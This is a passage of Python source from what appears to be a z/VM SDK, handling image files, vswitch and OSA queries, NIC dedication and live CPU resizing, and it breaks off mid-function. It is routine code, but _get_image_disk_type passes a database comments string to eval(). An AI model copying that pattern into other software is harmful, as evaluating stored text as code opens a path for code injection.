def _get_md5sum(self, fpath):
"""Calculate the md5sum of the specific image file"""
try:
current_md5 = hashlib.md5()
if isinstance(fpath, six.string_types) and os.path.exists(fpath):
with open(fpath, "rb") as fh:
for chunk in self._read_chunks(fh):
current_md5.update(chunk)
elif (fpath.__class__.__name__ in ["StringIO", "StringO"] or
isinstance(fpath, IOBase)):
for chunk in self._read_chunks(fpath):
current_md5.update(chunk)
else:
return ""
return current_md5.hexdigest()
except Exception:
msg = ("Failed to calculate the image's md5sum")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=3)
def _read_chunks(self, fh):
fh.seek(0)
chunk = fh.read(CHUNKSIZE)
while chunk:
yield chunk
chunk = fh.read(CHUNKSIZE)
else:
fh.seek(0)
def image_delete(self, image_name):
# Delete image file
try:
self._delete_image_file(image_name)
# Delete image record from db
self._ImageDbOperator.image_delete_record(image_name)
except exception.SDKImageOperationError as err:
results = err.results
if ((results['rc'] == 300) and (results['rs'] == 20)):
LOG.warning("Image %s does not exist", image_name)
return
else:
LOG.error("Failed to delete image %s, error: %s" %
(image_name, err.format_message()))
raise
msg = ('Delete image %s successfully' % image_name)
LOG.info(msg)
def _delete_image_file(self, image_name):
image_path = self._get_image_path_by_name(image_name)
self._pathutils.clean_temp_folder(image_path)
def _get_image_last_access_time(self, image_name, raise_exception=True):
"""Get the last access time of the image."""
image_file = os.path.join(self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev)
if not os.path.exists(image_file):
if raise_exception:
msg = 'Failed to get time stamp of image:%s' % image_name
LOG.error(msg)
raise exception.SDKImageOperationError(rs=23, img=image_name)
else:
# An invalid timestamp
return -1
atime = os.path.getatime(image_file)
return atime
def image_query(self, image_name=None):
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
# because database maybe None, so return nothing here
return []
# if image_name is not None, means there is only one record
if image_name:
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
image_info[0]['last_access_time'] = last_access_time
else:
for item in image_info:
image_name = item['imagename']
# set raise_exception to false because one failed
# may stop processing all the items in the list
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
item['last_access_time'] = last_access_time
return image_info
def image_get_root_disk_size(self, image_name):
"""Return the root disk units of the specified image
image_name: the unique image name in db
Return the disk units in format like 3339:CYL or 467200:BLK
"""
image_info = self.image_query(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
disk_size_units = image_info[0]['disk_size_units'].split(':')[0]
return disk_size_units
def image_get_os_distro(self, image_name):
"""
Return the operating system distro of the specified image
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
os_distro = image_info[0]['imageosdistro']
return os_distro
def _get_image_disk_type(self, image_name):
"""
Return image disk type
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if ((image_info[0]['comments'] is not None) and
(image_info[0]['comments'].__contains__('disk_type'))):
image_disk_type = eval(image_info[0]['comments'])['disk_type']
if image_disk_type == 'DASD':
return 'ECKD'
elif image_disk_type == 'SCSI':
return 'SCSI'
else:
return None
else:
return None
def punch_file(self, userid, fn, fclass):
rd = ("changevm %(uid)s punchfile %(file)s --class %(class)s" %
{'uid': userid, 'file': fn, 'class': fclass})
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to punch file to userid '%s',"
"error: %s" % (userid, err.format_message()))
raise
finally:
os.remove(fn)
def get_guest_connection_status(self, userid):
'''Get guest vm connection status.'''
rd = ' '.join(('getvm', userid, 'isreachable'))
results = self._request(rd)
if results['rs'] == 1:
return True
else:
return False
def _generate_disk_parmline(self, vdev, fmt, mntdir):
parms = [
'action=' + 'addMdisk',
'vaddr=' + vdev,
'filesys=' + fmt,
'mntdir=' + mntdir
]
parmline = ' '.join(parms)
parmstr = "'" + parmline + "'"
return parmstr
def process_additional_minidisks(self, userid, disk_info):
'''Generate and punch the scripts used to process additional disk into
target vm's reader.
'''
for idx, disk in enumerate(disk_info):
vdev = disk.get('vdev') or self.generate_disk_vdev(
offset = (idx + 1))
fmt = disk.get('format')
mount_dir = disk.get('mntdir') or ''.join(['/mnt/ephemeral',
str(vdev)])
# the mount point of swap partition is swap
if fmt == "swap":
mount_dir = "swap"
disk_parms = self._generate_disk_parmline(vdev, fmt, mount_dir)
func_name = '/var/lib/zvmsdk/setupDisk'
self.aemod_handler(userid, func_name, disk_parms)
# trigger do-script
if self.get_power_state(userid) == 'on':
self.execute_cmd(userid, "/usr/bin/zvmguestconfigure start")
def aemod_handler(self, instance_name, func_name, parms):
rd = ' '.join(['changevm', instance_name, 'aemod', func_name,
'--invparms', parms])
action = parms[0] + instance_name
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_user_console_output(self, userid):
# get console into reader
rd = 'getvm %s consoleoutput' % userid
action = 'get console log reader file list for guest vm: %s' % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
resp = self._request(rd)
with zvmutils.expect_invalid_resp_data(resp):
rf_list = resp['response'][0].rpartition(':')[2].strip().split()
# TODO: make sure reader device is online
# via 'cat /sys/bus/ccw/drivers/vmur/0.0.000c/online'
# 'sudo /sbin/cio_ignore -r 000c; sudo /sbin/chccwdev -e 000c'
# 'which udevadm &> /dev/null && udevadm settle || udevsettle'
logs = []
for rf in rf_list:
cmd = 'sudo /usr/sbin/vmur re -t -O %s' % rf
rc, output = zvmutils.execute(cmd)
if rc == 0:
logs.append(output)
return ''.join(logs)
def query_vswitch(self, switch_name):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % switch_name
))
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
msg = 'Vswitch %s does not exist' % switch_name
LOG.error(msg)
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
action = "query vswitch details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
vsw_info = {}
with zvmutils.expect_invalid_resp_data():
# ignore user_vlan_id part and jump to the vswitch basic info
idx_end = len(rd_list)
idx = 0
while((idx < idx_end) and
not rd_list[idx].__contains__('switch_name')):
idx = idx + 1
# The next 21 lines contains the vswitch basic info
# eg, name, type, port_type, vlan_awareness, etc
for i in range(21):
rd = rd_list[idx + i].split(':')
vsw_info[rd[0].strip()] = rd[1].strip()
idx = idx + 21
# Skip the vepa_status
while((idx < idx_end) and
not rd_list[idx].__contains__('real_device_address') and
not rd_list[idx].__contains__('port_num') and
not rd_list[idx].__contains__('adapter_owner')):
idx = idx + 1
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
if value == '(NONE)':
value = 'NONE'
return idx + offset, value
def _parse_dev_status(value):
if value in const.DEV_STATUS.keys():
return const.DEV_STATUS[value]
else:
return 'Unknown'
def _parse_dev_err(value):
if value in const.DEV_ERROR.keys():
return const.DEV_ERROR[value]
else:
return 'Unknown'
# Start to analyse the real devices info
vsw_info['real_devices'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('real_device_address')):
# each rdev has 6 lines' info
idx, rdev_addr = _parse_value(rd_list, idx,
'real_device_address: ')
idx, vdev_addr = _parse_value(rd_list, idx,
'virtual_device_address: ')
idx, controller = _parse_value(rd_list, idx,
'controller_name: ')
idx, port_name = _parse_value(rd_list, idx, 'port_name: ')
idx, dev_status = _parse_value(rd_list, idx,
'device_status: ')
idx, dev_err = _parse_value(rd_list, idx,
'device_error_status ')
vsw_info['real_devices'][rdev_addr] = {'vdev': vdev_addr,
'controller': controller,
'port_name': port_name,
'dev_status':
_parse_dev_status(
dev_status),
'dev_err': _parse_dev_err(
dev_err)
}
# Under some case there would be an error line in the output
# "Error controller_name is NULL!!", skip this line
if ((idx < idx_end) and
rd_list[idx].__contains__(
'Error controller_name is NULL!!')):
idx += 1
# Start to get the authorized userids
vsw_info['authorized_users'] = {}
while((idx < idx_end) and rd_list[idx].__contains__('port_num')):
# each authorized userid has 6 lines' info at least
idx, port_num = _parse_value(rd_list, idx,
'port_num: ')
idx, userid = _parse_value(rd_list, idx,
'grant_userid: ')
idx, prom_mode = _parse_value(rd_list, idx,
'promiscuous_mode: ')
idx, osd_sim = _parse_value(rd_list, idx, 'osd_sim: ')
idx, vlan_count = _parse_value(rd_list, idx,
'vlan_count: ')
vlan_ids = []
for i in range(int(vlan_count)):
idx, id = _parse_value(rd_list, idx,
'user_vlan_id: ')
vlan_ids.append(id)
# For vlan unaware vswitch, the query smcli would
# return vlan_count as 1, here we just set the count to 0
if (vsw_info['vlan_awareness'] == 'UNAWARE'):
vlan_count = 0
vlan_ids = []
vsw_info['authorized_users'][userid] = {
'port_num': port_num,
'prom_mode': prom_mode,
'osd_sim': osd_sim,
'vlan_count': vlan_count,
'vlan_ids': vlan_ids
}
# Start to get the connected adapters info
# OWNER_VDEV would be used as the dict key for each adapter
vsw_info['adapters'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('adapter_owner')):
# each adapter has four line info: owner, vdev, macaddr, type
idx, owner = _parse_value(rd_list, idx,
'adapter_owner: ')
idx, vdev = _parse_value(rd_list, idx,
'adapter_vdev: ')
idx, mac = _parse_value(rd_list, idx,
'adapter_macaddr: ')
idx, type = _parse_value(rd_list, idx, 'adapter_type: ')
key = owner + '_' + vdev
vsw_info['adapters'][key] = {
'mac': mac,
'type': type
}
# Todo: analyze and add the uplink NIC info and global member info
def _parse_switch_status(value):
if value in const.SWITCH_STATUS.keys():
return const.SWITCH_STATUS[value]
else:
return 'Unknown'
if 'switch_status' in vsw_info.keys():
vsw_info['switch_status'] = _parse_switch_status(
vsw_info['switch_status'])
return vsw_info
def get_nic_info(self, userid=None, nic_id=None, vswitch=None):
nic_info = self._NetDbOperator.switch_select_record(userid=userid,
nic_id=nic_id, vswitch=vswitch)
return nic_info
def is_first_network_config(self, userid):
action = "get guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
info = self._GuestDbOperator.get_guest_by_userid(userid)
# check net_set
if int(info[3]) == 0:
return True
else:
return False
def update_guestdb_with_net_set(self, userid):
action = "update guest '%s' in database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.update_guest_by_userid(userid, net_set='1')
def _is_OSA_free(self, OSA_device):
osa_info = self._query_OSA()
if 'OSA' not in osa_info.keys():
return False
elif len(osa_info['OSA']['FREE']) == 0:
return False
else:
dev1 = str(OSA_device).zfill(4).upper()
dev2 = str(str(hex(int(OSA_device, 16) + 1))[2:]).zfill(4).upper()
dev3 = str(str(hex(int(OSA_device, 16) + 2))[2:]).zfill(4).upper()
if ((dev1 in osa_info['OSA']['FREE']) and
(dev2 in osa_info['OSA']['FREE']) and
(dev3 in osa_info['OSA']['FREE'])):
return True
else:
return False
def _query_OSA(self):
smt_userid = zvmutils.get_smt_userid()
rd = "SMAPI %s API Virtual_Network_OSA_Query" % smt_userid
OSA_info = {}
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 4) and (err.results['rs'] == 4)):
msg = 'No OSAs on system'
LOG.info(msg)
return OSA_info
else:
action = "query OSA details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
with zvmutils.expect_invalid_resp_data():
idx_end = len(rd_list)
idx = 0
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
return idx + offset, value
# Start to analyse the osa devices info
while((idx < idx_end) and
rd_list[idx].__contains__('OSA Address')):
idx, osa_addr = _parse_value(rd_list, idx,
'OSA Address: ')
idx, osa_status = _parse_value(rd_list, idx,
'OSA Status: ')
idx, osa_type = _parse_value(rd_list, idx,
'OSA Type: ')
if osa_type != 'UNKNOWN':
idx, CHPID_addr = _parse_value(rd_list, idx,
'CHPID Address: ')
idx, Agent_status = _parse_value(rd_list, idx,
'Agent Status: ')
if osa_type not in OSA_info.keys():
OSA_info[osa_type] = {}
OSA_info[osa_type]['FREE'] = []
OSA_info[osa_type]['BOXED'] = []
OSA_info[osa_type]['OFFLINE'] = []
OSA_info[osa_type]['ATTACHED'] = []
if osa_status.__contains__('ATT'):
id = osa_status.split()[1]
item = (id, osa_addr)
OSA_info[osa_type]['ATTACHED'].append(item)
else:
OSA_info[osa_type][osa_status].append(osa_addr)
return OSA_info
def _get_available_vdev(self, userid, vdev=None):
ports_info = self._NetDbOperator.switch_select_table()
vdev_info = []
for p in ports_info:
if p['userid'] == userid.upper():
vdev_info.append(p['interface'])
if len(vdev_info) == 0:
# no nic defined for the guest
if vdev is None:
nic_vdev = CONF.zvm.default_nic_vdev
else:
nic_vdev = vdev
else:
if vdev is None:
used_vdev = max(vdev_info)
nic_vdev = str(hex(int(used_vdev, 16) + 3))[2:]
else:
if self._is_vdev_valid(vdev, vdev_info):
nic_vdev = vdev
else:
errmsg = ("The specified virtual device number %s "
"has already been used." % vdev)
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
if ((len(nic_vdev) > 4) or
(len(str(hex(int(nic_vdev, 16) + 2))[2:]) > 4)):
errmsg = ("Virtual device number %s is not valid" % nic_vdev)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return nic_vdev
def dedicate_OSA(self, userid, OSA_device, vdev=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
if not self._is_OSA_free(OSA_device):
errmsg = ("The specified OSA device number %s "
"is not free" % OSA_device)
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'dedicated OSA device is %(osa)s',
{'vdev': nic_vdev,
'osa': OSA_device})
self._dedicate_OSA(userid, OSA_device, nic_vdev, active=active)
return nic_vdev
def _dedicate_OSA_inactive_exception(self, error, userid, vdev,
OSA_device):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA_active_exception(self, error, userid, OSA_device):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 8)) or
((error.results['rc'] == 204) and (error.results['rs'] == 16))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA(self, userid, OSA_device, vdev, active=False):
if active:
self._is_active(userid)
msg = ('Start to dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user %s "
"in the guest's user direct, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for user"
" %s in the guest's user direct, "
"error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
self._dedicate_OSA_inactive_exception(err, userid, vdev,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
if active:
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user "
"%s on the active guest system, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct and active
detach_vdev = vdev
for j in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % detach_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s in the guest's user "
"direct, error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
detach_vdev = str(hex(int(detach_vdev, 16) + 1))[2:]
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err3:
if ((err3.results['rc'] == 204) and
(err3.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s on the active guest "
"system, error: %s" %
(def_vdev, userid,
err3.format_message()))
pass
self._dedicate_OSA_active_exception(err, userid,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
OSA_desc = 'OSA=%s' % OSA_device
self._NetDbOperator.switch_add_record(userid, vdev, comments=OSA_desc)
msg = ('Dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s successfully'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def _undedicate_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 44)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=16,
userid=userid, vdev=vdev,
msg=errmsg)
else:
raise error
def _undedicate_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=17,
userid=userid, vdev=vdev,
obj=obj_desc)
else:
raise error
def _undedicate_nic(self, userid, vdev, active=False,
del_active_only=False):
if active:
self._is_active(userid)
msg = ('Start to undedicate nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if not del_active_only:
def_vdev = vdev
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_inactive_exception(err, userid, vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
def_vdev = vdev
for i in range(3):
rd = ' '.join((
"SMAPI %s API Image_Device_Undedicate" %
userid,
"--operands",
'-v %s' % def_vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_active_exception(err, userid,
vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
msg = ('Undedicate nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _request_with_error_ignored(self, rd):
"""Send smt request, log and ignore any errors."""
try:
return self._request(rd)
except Exception as err:
# log as warning and ignore namelist operation failures
LOG.warning(six.text_type(err))
def namelist_add(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Add " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_remove(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Remove " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_query(self, namelist):
rd = "SMAPI %s API Name_List_Query" % namelist
resp = self._request_with_error_ignored(rd)
if resp is not None:
return resp['response']
else:
return []
def namelist_destroy(self, namelist):
rd = "SMAPI %s API Name_List_Destroy" % namelist
self._request_with_error_ignored(rd)
def _get_defined_cpu_addrs(self, userid):
user_direct = self.get_user_direct(userid)
defined_addrs = []
max_cpus = 0
for ent in user_direct:
if ent.startswith("CPU"):
cpu_addr = ent.split()[1].strip().upper()
defined_addrs.append(cpu_addr)
if ent.startswith("MACHINE ESA"):
max_cpus = int(ent.split()[2].strip())
return (max_cpus, defined_addrs)
def _get_available_cpu_addrs(self, used_addrs, max_cpus):
# Get available CPU addresses that are not defined in user entry
used_set = set(used_addrs)
available_addrs = set([hex(i)[2:].rjust(2, '0').upper()
for i in range(0, max_cpus)])
available_addrs.difference_update(used_set)
return list(available_addrs)
def _get_active_cpu_addrs(self, userid):
# Get the active cpu addrs in two-digit hex string in upper case
# Sample output for 'lscpu --parse=ADDRESS':
# # The following is the parsable format, which can be fed to other
# # programs. Each different item in every column has an unique ID
# # starting from zero.
# # Address
# 0
# 1
active_addrs = []
active_cpus = self.execute_cmd(userid, "lscpu --parse=ADDRESS")
for c in active_cpus:
# Skip the comment lines at beginning
if c.startswith("# "):
continue
addr = hex(int(c.strip()))[2:].rjust(2, '0').upper()
active_addrs.append(addr)
return active_addrs
def resize_cpus(self, userid, count):
# Check defined cpus in user entry. If greater than requested, then
# delete cpus. Otherwise, add new cpus.
# Return value: for revert usage, a tuple of
# action: The action taken for this resize, possible values:
# 0: no action, 1: add cpu, 2: delete cpu
# cpu_addrs: list of influenced cpu addrs
action = 0
updated_addrs = []
(max_cpus, defined_addrs) = self._get_defined_cpu_addrs(userid)
defined_count = len(defined_addrs)
# Check maximum cpu count defined
if max_cpus == 0:
LOG.error("Resize for guest '%s' cann't be done. The maximum "
"number of cpus is not defined in user directory." %
userid)
raise exception.SDKConflictError(modID='guest', rs=3,
userid=userid)
# Check requested count is less than the maximum cpus
if count > max_cpus:
LOG.error("Resize for guest '%s' cann't be done. The "
"requested number of cpus: '%i' exceeds the maximum "
"number of cpus allowed: '%i'." %
(userid, count, max_cpus))
raise exception.SDKConflictError(modID='guest', rs=4,
userid=userid,
req=count, max=max_cpus)
# Check count and take action
if defined_count == count:
LOG.info("The number of current defined CPUs in user '%s' equals "
"to requested count: %i, no action for static resize"
"needed." % (userid, count))
return (action, updated_addrs, max_cpus)
elif defined_count < count:
action = 1
# add more CPUs
available_addrs = self._get_available_cpu_addrs(defined_addrs,
max_cpus)
# sort the list and get the first few addrs to use
available_addrs.sort()
# Define new cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Update_DM " % userid,
"--operands"))
updated_addrs = available_addrs[0:count - defined_count]
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Define new cpus in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("New CPUs defined in user directory for '%s' "
"successfully" % userid)
return (action, updated_addrs, max_cpus)
else:
action = 2
# Delete CPUs
defined_addrs.sort()
updated_addrs = defined_addrs[-(defined_count - count):]
# Delete the last few cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM " % userid,
"--operands"))
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Delete CPUs in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("CPUs '%s' deleted from user directory for '%s' "
"successfully" % (str(updated_addrs), userid))
return (action, updated_addrs, max_cpus)
def live_resize_cpus(self, userid, count):
# Get active cpu count and compare with requested count
# If request count is smaller than the current count, then report
# error and exit immediately.
active_addrs = self._get_active_cpu_addrs(userid)
active_count = len(active_addrs)
if active_count > count:
LOG.error("Failed to live resize cpus of guest: %(uid)s, "
"current active cpu count: %(cur)i is greater than "
"the requested count: %(req)i." %
{'uid': userid, 'cur': active_count,
'req': count})
raise exception.SDKConflictError(modID='guest', rs=2,
userid=userid,
active=active_count,
req=count)
# Static resize CPUs. (add or delete CPUs from user directory)
(action, updated_addrs, max_cpus) = self.resize_cpus(userid, count)
if active_count == count:
# active count equals to requested
LOG.info("Current active cpu count of guest: '%s' equals to the "
"requested count: '%i', no more actions needed for "
"live resize." % (userid, count))
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
return
else:
# Get the number of cpus to add to active and check address
active_free = self._get_available_cpu_addrs(active_addrs,
max_cpus)
active_free.sort()
active_new = active_free[0:count - active_count]
# Do live resize
# Define new cpus
cmd_str = "vmcp def cpu " + ' '.join(active_new)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Define cpu of guest: '%s' to active failed with . "
"error: %s." % (userid, err1.format_message()))
# Start to do rollback
if action == 0:
LOG.error(msg1)
else:
LOG.error(msg1 + (" Will revert the user directory "
"change."))
# Combine influenced cpu addrs
cpu_entries = ""
for addr in updated_addrs:
cpu_entries += (" -k CPU=CPUADDR=%s" % addr)
rd = ''
if action == 1:
# Delete added CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM"
% userid, " --operands"))
else:
# Add deleted CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Create_DM"
% userid, " --operands"))
rd += cpu_entries
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
msg = ("Failed to revert user directory change for '"
"%s', SMT error: %s" % (userid,
err2.format_message()))
LOG.error(msg)
else:
LOG.info("Revert user directory change for '%s' "
"successfully." % userid)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
# Activate successfully, rescan in Linux layer to hot-plug new cpus
LOG.info("Added new CPUs to active configuration of guest '%s'" %
userid)
try:
self.execute_cmd(userid, "chcpu -r")
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Rescan cpus to hot-plug new defined cpus for guest: "
"'%s' failed with error: %s. No rollback is done and you"
"may need to check the status and restart the guest to "
"make the defined cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=8, userid=userid,
err=msg)
uname_out = self.execute_cmd(userid, "uname -a")
if uname_out and len(uname_out) >= 1:
distro = uname_out[0]
else:
distro = ''
if 'ubuntu' in distro or 'Ubuntu' in distro \
or 'UBUNTU' in distro:
try:
# need use chcpu -e <cpu-list> to make cpu online for Ubuntu
online_cmd = "chcpu -e " + ','.join(active_new)
self.execute_cmd(userid, online_cmd)
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Enable cpus for guest: '%s' failed with error: %s. "
"No rollback is done and you may need to check the "
"status and restart the guest to make the defined "
"cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=15, userid=userid,
err=msg)
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
def _get_defined_memory(self, userid):
user_direct = self.get_user_direct(userid)
defined_mem = max_mem = reserved_mem = -1
for ent in user_direct:
# u'USER userid password storage max privclass'
if ent.startswith("USER "):
fields = ent.split(' ')
if len(fields) != 6:
# This case should not exist if the target user
# is created by zcc and not updated manually by user
break
defined_mem = int(zvmutils.convert_to_mb(fields[3]))
max_mem = int(zvmutils.convert_to_mb(fields[4]))
# For legacy guests, the reserved memory may not be defined
if ent.startswith("COMMAND DEF STOR RESERVED"):
reserved_mem = int(zvmutils.convert_to_mb(ent.split(' ')[4]))
return (defined_mem, max_mem, reserved_mem, user_direct)
def _replace_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
entry_str = ""
if isinstance(user_entry, list):
for ent in user_entry:
if ent == "":
# skip empty line
continue
else:
entry_str += (ent + '\n')
else:
entry_str = user_entry
tmp_folder = tempfile.mkdtemp()
tmp_user_direct = os.path.join(tmp_folder, userid)
with open(tmp_user_direct, 'w') as f:
f.write(entry_str)
rd = ''.join(("SMAPI %s API Image_Replace_DM " % userid,
"--operands ",
"-f %s" % tmp_user_direct))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err1:
msg = ("Replace definition of guest '%s' failed with "
